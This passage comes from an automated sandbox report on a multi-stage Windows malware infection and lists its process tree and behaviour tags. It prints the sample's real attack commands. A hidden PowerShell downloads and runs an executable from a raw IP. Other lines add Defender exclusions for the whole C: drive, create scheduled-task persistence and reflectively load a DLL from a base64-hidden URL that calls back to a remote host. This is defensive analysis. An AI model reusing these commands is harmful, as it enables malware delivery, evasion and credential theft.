3196 Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE 99 PID 3196 wrote to memory of 6024 3196 Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE 99 PID 6024 wrote to memory of 3444 6024 rapes.exe 102 PID 6024 wrote to memory of 3444 6024 rapes.exe 102 PID 6024 wrote to memory of 3444 6024 rapes.exe 102 PID 6024 wrote to memory of 5952 6024 rapes.exe 104 PID 6024 wrote to memory of 5952 6024 rapes.exe 104 PID 6024 wrote to memory of 5952 6024 rapes.exe 104 PID 3444 wrote to memory of 5200 3444 f76de72994.exe 105 PID 3444 wrote to memory of 5200 3444 f76de72994.exe 105 PID 5200 wrote to memory of 5252 5200 chrome.exe 106 PID 5200 wrote to memory of 5252 5200 chrome.exe 106 PID 5200 wrote to memory of 5204 5200 chrome.exe 107 PID 5200 wrote to memory of 5204 5200 chrome.exe 107 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 5080 5200 chrome.exe 108 PID 5200 wrote to memory of 1468 5200 chrome.exe 109 PID 5200 wrote to memory of 1468 5200 chrome.exe 109 PID 5200 wrote to memory of 1468 5200 chrome.exe 109 PID 5200 wrote to memory of 1468 5200 chrome.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 7472 attrib.exe 7604 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3060
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4088
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn owzZGmaijU6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5396 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn owzZGmaijU6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2228
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Users\Admin\AppData\Local\Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE"C:\Users\Admin\AppData\Local\Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6024 -
C:\Users\Admin\AppData\Local\Temp\10301560101\f76de72994.exe"C:\Users\Admin\AppData\Local\Temp\10301560101\f76de72994.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa94aedcf8,0x7ffa94aedd04,0x7ffa94aedd109⤵PID:5252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2132 /prefetch:39⤵PID:5204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2060,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2068 /prefetch:29⤵PID:5080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2532 /prefetch:89⤵PID:1468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3196 /prefetch:19⤵
- Uses browser remote debugging
PID:1728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3228 /prefetch:19⤵
- Uses browser remote debugging
PID:5320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4264 /prefetch:29⤵
- Uses browser remote debugging
PID:4144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:19⤵
- Uses browser remote debugging
PID:3528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5280 /prefetch:89⤵PID:3084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5504,i,8077611848673865272,7987906112132332073,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5528 /prefetch:89⤵PID:4780
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:876 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ffa848ef208,0x7ffa848ef214,0x7ffa848ef2209⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:39⤵PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2232,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:29⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:89⤵PID:3044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3516,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:19⤵
- Uses browser remote debugging
PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,9066600092563726878,4639916656532183284,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:19⤵
- Uses browser remote debugging
PID:3600
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\aa1no" & exit8⤵
- System Location Discovery: System Language Discovery
PID:3080 -
C:\Windows\SysWOW64\timeout.exetimeout /t 119⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe"C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5952
-
-
C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1444 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe"C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe"7⤵
- Executes dropped EXE
PID:2984 -
C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\windowscore.exeC:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe"C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Program Files\RuntimeApp\0000013728.exe"C:\Program Files\RuntimeApp\0000013728.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe"C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:1068
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5732
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe"C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4968 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵PID:2704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"8⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:5292 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""9⤵
- Executes dropped EXE
PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""9⤵
- Deletes itself
- Executes dropped EXE
PID:7064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe"C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212 -
C:\Users\Admin\AppData\Roaming\media\svchost.exe"C:\Users\Admin\AppData\Roaming\media\svchost.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6184 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat8⤵
- System Location Discovery: System Language Discovery
PID:6140 -
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:10340
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5424
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"9⤵
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4408249⤵
- System Location Discovery: System Language Discovery
PID:3680
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Architecture.wmv9⤵
- System Location Discovery: System Language Discovery
PID:4384
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Offensive" Inter9⤵
- System Location Discovery: System Language Discovery
PID:8780
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com9⤵
- System Location Discovery: System Language Discovery
PID:8864
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h9⤵
- System Location Discovery: System Language Discovery
PID:10556
-
-
C:\Users\Admin\AppData\Local\Temp\440824\Organizations.comOrganizations.com h9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:9420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9420 -s 92410⤵
- Program crash
PID:13068
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵
- System Location Discovery: System Language Discovery
PID:4132
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe"C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:7240 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe8⤵
- Views/modifies file attributes
PID:7472
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe8⤵
- Views/modifies file attributes
PID:7604
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:8272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "8⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:11816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:4396
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:11920
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE327.tmp"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:11952
-
-
C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2540
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301670101\XEh4XP0.exe"C:\Users\Admin\AppData\Local\Temp\10301670101\XEh4XP0.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:9012
-
-
C:\Users\Admin\AppData\Local\Temp\10301680101\XEh4XP0.exe"C:\Users\Admin\AppData\Local\Temp\10301680101\XEh4XP0.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9588
-
-
C:\Users\Admin\AppData\Local\Temp\10301690101\FdqlBTs.exe"C:\Users\Admin\AppData\Local\Temp\10301690101\FdqlBTs.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:11924 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 1.bat && 2.js8⤵
- Checks computer location settings
- Modifies registry class
PID:11948 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name9⤵
- Suspicious use of AdjustPrivilegeToken
PID:8716
-
-
C:\Windows\system32\find.exefind "QEMU"9⤵PID:8724
-
-
